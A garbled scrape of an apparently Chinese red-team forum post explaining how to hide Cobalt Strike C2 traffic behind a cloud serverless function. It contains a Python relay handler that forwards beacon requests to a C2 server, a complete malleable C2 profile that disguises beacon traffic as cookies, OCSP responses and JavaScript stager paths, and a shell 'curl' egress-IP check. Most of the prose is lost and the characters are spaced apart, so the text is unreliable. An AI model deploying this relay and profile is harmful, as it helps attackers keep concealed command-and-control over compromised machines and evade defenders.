[396] 2021-05-30_CS使用云函数隐藏C2流量

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-16
2021-05-30_CS使用云函数隐藏C2流量 C S 使 C 2   a F a   a F a   2 0 2 1 - 0 5 - 3 0   # R e d T e a m   , 5 C 2 C D N C 2 S e r v e r l e s s S e r v e r l e s s S e r v e r l e s s 线 线 西 S e r v e r l e s s S e r v e r l e s s S e r v e r l e s s S e r v e r l e s s S e r v e r l e s s 线 S e r v e r l e s s
线 线 S e r v e r l e s s S e r v e r l e s s S e r v e r l e s s h t t p S e r v e r l e s s S e r v e r l e s s 绿 S e r v e r l e s s 使 S e r v e r l e s s T X
T X S e r v e r l e s s P Y 3 . 6
L A T E S T A P I A P I
访 U R L 4 0 3 H e l l o W o r d 便 A P I C S #   - * -   c o d i n g :   u t f 8   - * - i m p o r t   j s o n , r e q u e s t s , b a s e 6 4 d e f   m a i n _ h a n d l e r ( e v e n t ,   c o n t e x t ) :         C 2 = ' h t t p : / / < C 2 > '   #   使   H T T P H T T P S ~ ~         p a t h = e v e n t [ ' p a t h ' ]         h e a d e r s = e v e n t [ ' h e a d e r s ' ]
e v e n t c o n t e x t C 2 r e t u r n C 2 S e r v e r l e s s A P I A P I         p r i n t ( e v e n t )         i f   e v e n t [ ' h t t p M e t h o d ' ]   = =   ' G E T '   :                 r e s p = r e q u e s t s . g e t ( C 2 + p a t h , h e a d e r s = h e a d e r s , v e r i f y = F a l s e )         e l s e :                 r e s p = r e q u e s t s . p o s t ( C 2 + p a t h , d a t a = e v e n t [ ' b o d y ' ] , h e a d e r s = h e a d e r s , v e r i f y = F a l s e )                 p r i n t ( r e s p . h e a d e r s )                 p r i n t ( r e s p . c o n t e n t )         r e s p o n s e = {                 " i s B a s e 6 4 E n c o d e d " :   T r u e ,                 " s t a t u s C o d e " :   r e s p . s t a t u s _ c o d e ,                 " h e a d e r s " :   d i c t ( r e s p . h e a d e r s ) ,                 " b o d y " :   s t r ( b a s e 6 4 . b 6 4 e n c o d e ( r e s p . c o n t e n t ) ) [ 2 : - 1 ]         }         r e t u r n   r e s p o n s e
访 8 0 4 4 3 C S h t t p 8 0 h t t p s 4 4 3 . C S   P r o f i l e s e t   s a m p l e _ n a m e   " t " ; s e t   s l e e p t i m e   " 3 0 0 0 " ; s e t   j i t t e r       " 0 " ; s e t   m a x d n s       " 2 5 5 " ; s e t   u s e r a g e n t   " M o z i l l a / 5 . 0   ( c o m p a t i b l e ;   M S I E   8 . 0 ;   W i n d o w s   N T   6 . 1 ;   T r i d e n t / 5 . 0 ) " ; h t t p - g e t   {     s e t   u r i   " / a p i / x " ;     c l i e n t   {             h e a d e r   " A c c e p t "   " * / * " ;             m e t a d a t a   {                     b a s e 6 4 ;                     p r e p e n d   " S E S S I O N I D = " ;                     h e a d e r   " C o o k i e " ;             }     }
h e a d e r b i n a r y b a s e 6 4 使 C S H o s t s S t a g e r   H o s t U R L h t t p : / / : 8 0 线 U R L 8 0 4 4 3 C 2 使 8 8 8 8 线 使 8 0     s e r v e r   {             h e a d e r   " C o n t e n t - T y p e "   " a p p l i c a t i o n / o c s p - r e s p o n s e " ;             h e a d e r   " c o n t e n t - t r a n s f e r - e n c o d i n g "   " b i n a r y " ;             h e a d e r   " S e r v e r "   " N o d e j s " ;             o u t p u t   {                     b a s e 6 4 ;                     p r i n t ;             }     } } h t t p - s t a g e r   {     s e t   u r i _ x 8 6   " / v u e . m i n . j s " ;     s e t   u r i _ x 6 4   " / b o o t s t r a p - 2 . m i n . j s " ; } h t t p - p o s t   {     s e t   u r i   " / a p i / y " ;     c l i e n t   {             h e a d e r   " A c c e p t "   " * / * " ;             i d   {                     b a s e 6 4 ;                     p r e p e n d   " J S E S S I O N = " ;                     h e a d e r   " C o o k i e " ;             }             o u t p u t   {                     b a s e 6 4 ;                     p r i n t ;             }     }     s e r v e r   {             h e a d e r   " C o n t e n t - T y p e "   " a p p l i c a t i o n / o c s p - r e s p o n s e " ;             h e a d e r   " c o n t e n t - t r a n s f e r - e n c o d i n g "   " b i n a r y " ;             h e a d e r   " C o n n e c t i o n "   " k e e p - a l i v e " ;             o u t p u t   {                     b a s e 6 4 ;                     p r i n t ;             }     } }
线 I P I P I P s h e l l   c u r l   i d e n t . m e h t t p s
C D N I P I P
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则